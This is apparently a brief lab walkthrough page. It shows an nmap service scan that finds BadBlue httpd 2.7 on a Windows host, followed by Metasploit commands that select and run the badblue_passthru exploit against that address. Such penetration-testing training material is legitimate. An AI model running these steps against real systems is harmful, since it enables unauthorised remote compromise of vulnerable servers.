nmap -sV -p 80 10.2.29.32
80/tcp open http BadBlue httpd 2.7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
msfconsole -q
search badblue use exploit/windows/http/badblue_passthru set RHOSTS 10.2.29.32 run
Last updated 1 year ago